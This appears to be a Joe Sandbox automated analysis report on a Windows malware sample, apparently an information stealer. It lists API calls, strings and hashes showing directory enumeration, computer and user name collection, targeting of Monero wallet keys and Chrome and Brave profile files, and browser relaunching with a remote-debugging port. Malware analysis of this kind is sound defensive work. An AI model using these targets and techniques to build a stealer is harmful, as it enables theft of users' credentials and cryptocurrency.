                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: f7bf57507ccd26f6662b398420ab2806915cd4d07a9a32a876551b1ac36406b8
                            • Instruction ID: 8cc4a8b8b28687d877384e335d297aac7b3fd3579be6a58dd0169b4f0d1ea5ce
                            • Opcode Fuzzy Hash: f7bf57507ccd26f6662b398420ab2806915cd4d07a9a32a876551b1ac36406b8
                            • Instruction Fuzzy Hash: F1E01D70D4530CFFE7216B90ED0EB4D767CAB04B15F100255F709761C5C6B535405759
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F310B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F310F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 688397cd900a9f736d6602573b022d6a8f73bd41f1f74d35ec6859868f4b52d4
                            • Instruction ID: 858e2734ad28516633df871be48f4b6662e1563b64d996c0526886545eec9600
                            • Opcode Fuzzy Hash: 688397cd900a9f736d6602573b022d6a8f73bd41f1f74d35ec6859868f4b52d4
                            • Instruction Fuzzy Hash: A0F0E2B1641208BBE7289AA4AC5DFAEB7A8F705B14F300548F940E7280D571AE00DBA0
                            APIs
                              • Part of subcall function 00F47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47AA0
                              • Part of subcall function 00F47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F47AA7
                              • Part of subcall function 00F47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F47ABF
                              • Part of subcall function 00F479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F311B7), ref: 00F47A10
                              • Part of subcall function 00F479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F47A17
                              • Part of subcall function 00F479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F47A2F
                            • ExitProcess.KERNEL32 ref: 00F311C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 8baefed9a21826357f0fe4372c7422217ad4cebd4df2fdeebd722311845d6df7
                            • Instruction ID: 0a122bbae6ddd045cb414c41bd117234be440facc4f51d9fab5a1d7881fa0438
                            • Opcode Fuzzy Hash: 8baefed9a21826357f0fe4372c7422217ad4cebd4df2fdeebd722311845d6df7
                            • Instruction Fuzzy Hash: 9FE017A5D0430167DA20B7B4BC0BB6F3A8CAB5476AF000918FE0982547EE29F811A275
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00F50B32,00F50B2F,00000000,?,?,?,00F51450,00F50B2E), ref: 00F3BEC5
                            • StrCmpCA.SHLWAPI(?,00F51454), ref: 00F3BF33
                            • StrCmpCA.SHLWAPI(?,00F51458), ref: 00F3BF49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3C8A9
                            • FindClose.KERNEL32(000000FF), ref: 00F3C8BB
                            Strings
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F3C495
                            • Google Chrome, xrefs: 00F3C6F8
                            • \Brave\Preferences, xrefs: 00F3C1C1
                            • Brave, xrefs: 00F3C0E8
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F3C3B2
                            • Preferences, xrefs: 00F3C104
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F3C534
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-1869280968
                            • Opcode ID: f18af6e46dc188bae49a0c96dc127068e216d1d811bba3fd0efdce6aa217b51b
                            • Instruction ID: 877ddae1533ef045251b6df23029cdd1d09f27d8ed7fd0c522d38cc3d9294b2b
                            • Opcode Fuzzy Hash: f18af6e46dc188bae49a0c96dc127068e216d1d811bba3fd0efdce6aa217b51b
                            • Instruction Fuzzy Hash: 9E5259729501189BDB15FB70DD96EEE773DAF94300F404598F90666081EF38AB48DFA2
                            APIs
                            • wsprintfA.USER32 ref: 00F43B1C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F43B33
                            • lstrcat.KERNEL32(?,?), ref: 00F43B85
                            • StrCmpCA.SHLWAPI(?,00F50F58), ref: 00F43B97
                            • StrCmpCA.SHLWAPI(?,00F50F5C), ref: 00F43BAD
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F43EB7
                            • FindClose.KERNEL32(000000FF), ref: 00F43ECC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 4c6c11e1c01e713aee3874d36962b153e90e2ee7afa13e35a056eacea4cb4edf
                            • Instruction ID: 093896db27b8fa9f6131f827a6a32bac42bf24231016cd7b5c949a1b93c61f71
                            • Opcode Fuzzy Hash: 4c6c11e1c01e713aee3874d36962b153e90e2ee7afa13e35a056eacea4cb4edf
                            • Instruction Fuzzy Hash: 41A15471A002189FDB35DF64DC89FEE7779BB44300F044688BA4D96185DB74AB88DF61
                            APIs
                            • wsprintfA.USER32 ref: 00F44B7C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F44B93
                            • StrCmpCA.SHLWAPI(?,00F50FC4), ref: 00F44BC1
                            • StrCmpCA.SHLWAPI(?,00F50FC8), ref: 00F44BD7
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F44DCD
                            • FindClose.KERNEL32(000000FF), ref: 00F44DE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: febc3b7a816ee7bd377561c98956ce646da2f89d01e3faee04ea003601420e7b
                            • Instruction ID: b762fe9f4304804f74730ac80236ed55e08090c4481e93fafd40bf9092db0a93
                            • Opcode Fuzzy Hash: febc3b7a816ee7bd377561c98956ce646da2f89d01e3faee04ea003601420e7b
                            • Instruction Fuzzy Hash: AF613972900118ABDB35EBA0EC49FEA777CFB48701F044688BA4996145EF74EB48DF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F447D0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F447D7
                            • wsprintfA.USER32 ref: 00F447F6
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F4480D
                            • StrCmpCA.SHLWAPI(?,00F50FAC), ref: 00F4483B
                            • StrCmpCA.SHLWAPI(?,00F50FB0), ref: 00F44851
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F448DB
                            • FindClose.KERNEL32(000000FF), ref: 00F448F0
                            • lstrcat.KERNEL32(?,0098E470), ref: 00F44915
                            • lstrcat.KERNEL32(?,0098D4D8), ref: 00F44928
                            • lstrlen.KERNEL32(?), ref: 00F44935
                            • lstrlen.KERNEL32(?), ref: 00F44946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 188b7ccaee5d461933f433d39a1ffe7a77d905fb900db82226d94de164a74b63
                            • Instruction ID: 058e4a7ffe7ba7ea3a00523f014ab9699833f33fcbfe1a1c939e885d1b3bcd2c
                            • Opcode Fuzzy Hash: 188b7ccaee5d461933f433d39a1ffe7a77d905fb900db82226d94de164a74b63
                            • Instruction Fuzzy Hash: 295176719402189BDB20EB70DC8DFED777CAB58300F004688BA4996085DB74EB84DFA1
                            APIs
                            • wsprintfA.USER32 ref: 00F44113
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F4412A
                            • StrCmpCA.SHLWAPI(?,00F50F94), ref: 00F44158
                            • StrCmpCA.SHLWAPI(?,00F50F98), ref: 00F4416E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F442BC
                            • FindClose.KERNEL32(000000FF), ref: 00F442D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 9fd6247bf05bec3042a67a149d445054c4805b150d8546e9325212eab308af6d
                            • Instruction ID: 220633a51518715f596d99a5d1154d3b371d5fc5b5700963ba1546348f0db6c4
                            • Opcode Fuzzy Hash: 9fd6247bf05bec3042a67a149d445054c4805b150d8546e9325212eab308af6d
                            • Instruction Fuzzy Hash: 7C5158B2900118AFDB25EBB0DC49FEE777CBB54300F004688BA4996045DB75AB89DF54
                            APIs
                            • wsprintfA.USER32 ref: 00F3EE3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F3EE55
                            • StrCmpCA.SHLWAPI(?,00F51630), ref: 00F3EEAB
                            • StrCmpCA.SHLWAPI(?,00F51634), ref: 00F3EEC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3F3AE
                            • FindClose.KERNEL32(000000FF), ref: 00F3F3C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: f19ccee087cfa2e62e1ba7a359daa934b1b359491260a91c90b2958fc5ad7269
                            • Instruction ID: 7d4e15956485b022da3087153a469d3ba8f67404b61f16025d5e661794e7d718
                            • Opcode Fuzzy Hash: f19ccee087cfa2e62e1ba7a359daa934b1b359491260a91c90b2958fc5ad7269
                            • Instruction Fuzzy Hash: 17E164729511189BEB55FB60CCA2EEE773DAF50300F4045D9B90A62092EF346F89DF52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                            • API String ID: 0-1562099544
                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction ID: 5b7cc40c466f8631baaefeab186672acb9d548a137fba83f41b434649e913d08
                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction Fuzzy Hash: A1E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F516B0,00F50D97), ref: 00F3F81E
                            • StrCmpCA.SHLWAPI(?,00F516B4), ref: 00F3F86F
                            • StrCmpCA.SHLWAPI(?,00F516B8), ref: 00F3F885
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3FBB1
                            • FindClose.KERNEL32(000000FF), ref: 00F3FBC3
                            Strings
